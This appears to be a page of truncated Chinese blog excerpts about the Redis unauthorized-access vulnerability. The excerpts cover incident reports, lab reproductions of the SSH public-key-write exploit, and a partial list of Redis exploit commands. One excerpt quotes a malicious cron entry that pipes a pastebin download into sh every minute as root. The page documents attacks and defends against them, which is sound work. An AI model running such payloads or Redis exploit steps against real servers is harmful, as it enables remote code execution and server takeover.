昨天阿里雲攔截到了一次異常登陸，改了密碼后就沒有管他， 今天阿里雲給我發消息說我的服務器可能被黑客利用，存在惡意發包行為。。。。。。。 不過我不打算只是單純的重置系統，經過一系列的查找原因后，發現被攻擊的原因是我的redis沒有設置登陸密碼（redis 默認情況下，沒有配置登陸密碼，任意用戶 ...

先復現一篇公鑰寫入的利用方式，以便明天使用，后續補上其他利用方式。 一、環境准備 　　1.靶機環境 CenOS 7 64 redis-2.8.12 　　192.168.0.111 　　2.攻擊機 kail　　64 redis-2.8.12 　　　 　　環境安裝有幾個坑 ...

Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情況下，利用 Redis 自身的 ...

以前的筆記 簡介 redis是一個key-value存儲系統。和Memcached類似，它支持存儲的value類型相對更多，包括string(字符串)、list(鏈表)、set(集合)、zset(sorted set --有序集合)和hash（哈希類型）。這些數據類型都支持 ...

目錄 Redis未授權漏洞 引言 Redis是什么 Redis的應用場景有哪些？ Redis的數據類型及主要特性 String類型 ...

情況復述：Linux+redis+python，通過python代碼向redis中寫入數據，前幾周都能正常運行，今天突然不行了。因為需要從線下取數，進行爬取操作，急需解決。 1.測試線下代碼插入redis是否成功，取數是否成功 2.查看線上是否只有一個redis數據庫，是否有多個開放端口，密碼 ...

起因 偶然間發現redis里有一個陌生key：tightsoft，它的值是：*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh 看key名就知道這肯定不是我們存的，再看value我警覺了，這是要定時執行腳本啊。 分析 ...

前提： 　　1.靶機是Centos環境 　　2.redis低版本，具體低於多少不清楚 ——————主要幾個命令操作—————— 　　flushall 　　　　　　　　　　　　//清空所有key值　　config get dir 　　　　 　　　　//獲取路徑　　config set ...